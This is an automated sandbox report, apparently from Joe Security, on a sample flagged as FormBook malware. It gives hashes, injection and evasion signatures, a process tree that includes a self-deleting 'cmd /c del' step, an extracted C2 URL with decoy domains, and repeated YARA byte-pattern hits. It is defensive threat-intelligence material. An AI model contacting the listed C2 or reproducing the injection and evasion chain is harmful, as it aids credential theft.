Edit tour

Windows Analysis Report
jwRbEDUUZC

Overview

General Information

Sample Name:	jwRbEDUUZC (renamed file extension from none to exe)
Analysis ID:	633935
MD5:	f177fee6286dc51d2baf18d07c92d216
SHA1:	d87655521e74faaecb380fc8ac338ec5a00b048a
SHA256:	7a34ef3a5f0d2db6674d93de3143d2469d8fa06bf450dc4c1609c97822e68f53
Tags:	32exetrojan
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Writes to foreign memory regions

.NET source code references suspicious native API functions

Machine Learning detection for sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

.NET source code contains very large strings

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

PE / OLE file has an invalid certificate

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

jwRbEDUUZC.exe (PID: 1548 cmdline: "C:\Users\user\Desktop\jwRbEDUUZC.exe" MD5: F177FEE6286DC51D2BAF18D07C92D216)

aspnet_compiler.exe (PID: 6272 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

explorer.exe (PID: 3688 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmmon32.exe (PID: 6768 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)

cmd.exe (PID: 6872 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.458062573.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.458062573.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.458062573.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000000.371851439.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000000.371851439.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000000.371851439.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.635249504.00000000046A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.635249504.00000000046A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.635249504.00000000046A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000000.419943976.000000000D55D000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000000.419943976.000000000D55D000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000000.419943976.000000000D55D000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000000.371477540.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000000.371477540.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000000.371477540.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.373668020.00000000035FC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.373668020.00000000035FC000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x73828:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x73bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b648:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b9d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7f8c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xa76e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x7f3b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xa71d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x7f9c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xa77e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x7fb3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa795f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x745ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x9c3ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x7e62c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa644c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x75342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x9d162:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x84db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xacbd7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x85e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.373668020.00000000035FC000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x81ce9:$sqlite3step: 68 34 1C 7B E1 0x81dfc:$sqlite3step: 68 34 1C 7B E1 0xa9b09:$sqlite3step: 68 34 1C 7B E1 0xa9c1c:$sqlite3step: 68 34 1C 7B E1 0x81d18:$sqlite3text: 68 38 2A 90 C5 0x81e3d:$sqlite3text: 68 38 2A 90 C5 0xa9b38:$sqlite3text: 68 38 2A 90 C5 0xa9c5d:$sqlite3text: 68 38 2A 90 C5 0x81d2b:$sqlite3blob: 68 53 D8 7F 8C 0x81e53:$sqlite3blob: 68 53 D8 7F 8C 0xa9b4b:$sqlite3blob: 68 53 D8 7F 8C 0xa9c73:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.458109413.0000000000D00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.458109413.0000000000D00000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.458109413.0000000000D00000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000000.444239022.000000000D55D000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000000.444239022.000000000D55D000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000000.444239022.000000000D55D000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.aspnet_compiler.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.aspnet_compiler.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
1.0.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.0.aspnet_compiler.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.aspnet_compiler.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
1.0.aspnet_compiler.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.0.aspnet_compiler.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.aspnet_compiler.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
1.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.aspnet_compiler.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.aspnet_compiler.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
1.0.aspnet_compiler.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
